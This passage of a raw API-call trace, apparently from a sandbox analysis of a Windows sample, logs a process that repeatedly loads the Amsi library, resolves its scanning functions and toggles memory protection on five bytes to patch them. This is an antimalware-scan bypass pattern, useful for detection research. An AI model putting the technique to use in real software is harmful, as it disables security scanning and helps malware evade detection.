returned 1 [0098.730] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.730] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.732] SetErrorMode (uMode=0x8000) returned 0x0 [0098.732] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.738] SetErrorMode (uMode=0x0) returned 0x8000 [0098.739] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.739] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0098.739] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.779] GetCurrentProcess () returned 0xffffffff [0098.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.779] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.780] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.781] SetErrorMode (uMode=0x8000) returned 0x0 [0098.781] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.785] SetErrorMode (uMode=0x0) returned 0x8000 [0098.786] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.786] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0098.786] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.828] GetCurrentProcess () returned 0xffffffff [0098.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.828] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.828] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.829] SetErrorMode (uMode=0x8000) returned 0x0 [0098.830] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.833] SetErrorMode (uMode=0x0) returned 0x8000 [0098.833] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.834] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.834] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.877] GetCurrentProcess () returned 0xffffffff [0098.877] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.877] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.878] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.879] SetErrorMode (uMode=0x8000) returned 0x0 [0098.879] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.882] SetErrorMode (uMode=0x0) returned 0x8000 [0098.882] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.882] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.882] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.882] GetCurrentProcess () returned 0xffffffff [0098.883] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.883] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.883] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.884] SetErrorMode (uMode=0x8000) returned 0x0 [0098.884] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.887] SetErrorMode (uMode=0x0) returned 0x8000 [0098.887] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.888] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.888] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.888] GetCurrentProcess () returned 0xffffffff [0098.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.888] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.888] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.889] SetErrorMode (uMode=0x8000) returned 0x0 [0098.889] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.893] SetErrorMode (uMode=0x0) returned 0x8000 [0098.893] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.893] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0098.894] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.958] GetCurrentProcess () returned 0xffffffff [0098.958] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.958] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.958] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.960] VirtualAlloc (lpAddress=0x2331000, dwSize=0x14304, flAllocationType=0x1000, flProtect=0x4) returned 0x2331000 [0098.960] SetErrorMode (uMode=0x8000) returned 0x0 [0098.960] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.964] SetErrorMode (uMode=0x0) returned 0x8000 [0098.964] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.965] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.965] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.014] GetCurrentProcess () returned 0xffffffff [0099.014] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.014] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.014] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.016] SetErrorMode (uMode=0x8000) returned 0x0 [0099.016] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.023] SetErrorMode (uMode=0x0) returned 0x8000 [0099.023] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.023] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0099.023] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.076] GetCurrentProcess () returned 0xffffffff [0099.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.076] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.076] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.079] SetErrorMode (uMode=0x8000) returned 0x0 [0099.080] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.085] SetErrorMode (uMode=0x0) returned 0x8000 [0099.085] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.085] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.085] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.168] GetCurrentProcess () returned 0xffffffff [0099.168] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.168] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.168] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.172] SetErrorMode (uMode=0x8000) returned 0x0 [0099.172] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.176] SetErrorMode (uMode=0x0) returned 0x8000 [0099.177] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.177] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.177] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.177] GetCurrentProcess () returned 0xffffffff [0099.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.177] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.178] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.179] SetErrorMode (uMode=0x8000) returned 0x0 [0099.179] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.183] SetErrorMode (uMode=0x0) returned 0x8000 [0099.183] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.183] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0099.183] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.223] GetCurrentProcess () returned 0xffffffff [0099.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.223] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.223] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.224] VirtualAlloc (lpAddress=0x2346000, dwSize=0x5b8, flAllocationType=0x1000, flProtect=0x4) returned 0x2346000 [0099.224] SetErrorMode (uMode=0x8000) returned 0x0 [0099.224] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.227] SetErrorMode (uMode=0x0) returned 0x8000 [0099.227] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.228] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.228] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.260] GetCurrentProcess () returned 0xffffffff [0099.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.260] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.261] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.262] SetErrorMode (uMode=0x8000) returned 0x0 [0099.262] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.265] SetErrorMode (uMode=0x0) returned 0x8000 [0099.265] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.265] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0099.265] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.295] GetCurrentProcess () returned 0xffffffff [0099.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.295] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.295] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.296] SetErrorMode (uMode=0x8000) returned 0x0 [0099.296] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.307] SetErrorMode (uMode=0x0) returned 0x8000 [0099.308] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.308] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.308] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.374] GetCurrentProcess () returned 0xffffffff [0099.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.374] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.431] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.432] SetErrorMode (uMode=0x8000) returned 0x0 [0099.432] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.439] SetErrorMode (uMode=0x0) returned 0x8000 [0099.439] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.439] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.439] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.481] GetCurrentProcess () returned 0xffffffff [0099.481] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.481] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.484] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.486] SetErrorMode (uMode=0x8000) returned 0x0 [0099.486] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.490] SetErrorMode (uMode=0x0) returned 0x8000 [0099.490] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.491] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0099.491] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.677] GetCurrentProcess () returned 0xffffffff [0099.677] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.677] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.677] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.678] VirtualAlloc (lpAddress=0x2347000, dwSize=0x1091, flAllocationType=0x1000, flProtect=0x4) returned 0x2347000 [0099.679] SetErrorMode (uMode=0x8000) returned 0x0 [0099.679] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.684] SetErrorMode (uMode=0x0) returned 0x8000 [0099.684] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.684] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.684] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.787] GetCurrentProcess () returned 0xffffffff [0099.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.787] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.787] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.788] SetErrorMode (uMode=0x8000) returned 0x0 [0099.788] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.794] SetErrorMode (uMode=0x0) returned 0x8000 [0099.794] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.795] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0099.795] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0099.900] GetCurrentProcess () returned 0xffffffff [0099.900] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0099.900] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0099.901] FreeLibrary (hLibModule=0x6f870000) returned 1 [0099.903] SetErrorMode (uMode=0x8000) returned 0x0 [0099.903] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0099.911] SetErrorMode (uMode=0x0) returned 0x8000 [0099.911] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0099.911] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0099.912] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.121] GetCurrentProcess () returned 0xffffffff [0100.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.121] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.121] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.264] SetErrorMode (uMode=0x8000) returned 0x0 [0100.264] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.268] SetErrorMode (uMode=0x0) returned 0x8000 [0100.268] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.268] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.268] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.268] GetCurrentProcess () returned 0xffffffff [0100.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.268] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.269] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.270] SetErrorMode (uMode=0x8000) returned 0x0 [0100.270] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.273] SetErrorMode (uMode=0x0) returned 0x8000 [0100.273] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.274] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0100.274] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.335] GetCurrentProcess () returned 0xffffffff [0100.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.335] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.335] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.336] VirtualAlloc (lpAddress=0x2349000, dwSize=0xc94, flAllocationType=0x1000, flProtect=0x4) returned 0x2349000 [0100.337] SetErrorMode (uMode=0x8000) returned 0x0 [0100.337] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.365] SetErrorMode (uMode=0x0) returned 0x8000 [0100.366] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.366] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.366] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.483] GetCurrentProcess () returned 0xffffffff [0100.483] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.483] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.483] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.485] SetErrorMode (uMode=0x8000) returned 0x0 [0100.485] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.488] SetErrorMode (uMode=0x0) returned 0x8000 [0100.489] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.489] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0100.489] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.563] GetCurrentProcess () returned 0xffffffff [0100.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.563] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.563] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.565] SetErrorMode (uMode=0x8000) returned 0x0 [0100.565] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.568] SetErrorMode (uMode=0x0) returned 0x8000 [0100.568] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.568] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.568] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.611] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.611] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.613] SetErrorMode (uMode=0x8000) returned 0x0 [0100.613] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.616] SetErrorMode (uMode=0x0) returned 0x8000 [0100.616] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.616] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.616] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.616] GetCurrentProcess () returned 0xffffffff [0100.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.616] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.617] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.618] SetErrorMode (uMode=0x8000) returned 0x0 [0100.618] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.621] SetErrorMode (uMode=0x0) returned 0x8000 [0100.621] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.621] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0100.621] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.666] GetCurrentProcess () returned 0xffffffff [0100.666] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.666] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.666] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.667] VirtualAlloc (lpAddress=0x234a000, dwSize=0x19b8, flAllocationType=0x1000, flProtect=0x4) returned 0x234a000 [0100.667] SetErrorMode (uMode=0x8000) returned 0x0 [0100.667] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.671] SetErrorMode (uMode=0x0) returned 0x8000 [0100.671] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.671] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.671] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.713] GetCurrentProcess () returned 0xffffffff [0100.713] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.713] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.713] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.714] SetErrorMode (uMode=0x8000) returned 0x0 [0100.714] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.718] SetErrorMode (uMode=0x0) returned 0x8000 [0100.719] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.719] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0100.719] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.762] GetCurrentProcess () returned 0xffffffff [0100.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.762] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.762] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.764] SetErrorMode (uMode=0x8000) returned 0x0 [0100.765] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.768] SetErrorMode (uMode=0x0) returned 0x8000 [0100.768] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.768] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.768] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.825] GetCurrentProcess () returned 0xffffffff [0100.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0100.825] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0100.826] FreeLibrary (hLibModule=0x6f870000) returned 1 [0100.829] SetErrorMode (uMode=0x8000) returned 0x0 [0100.829] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0100.838] SetErrorMode (uMode=0x0) returned 0x8000 [0100.838] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0100.838] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0100.838] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0100.838] GetCurrentProcess () returned 0xffffffff [0100.838] FlushInstructionCache 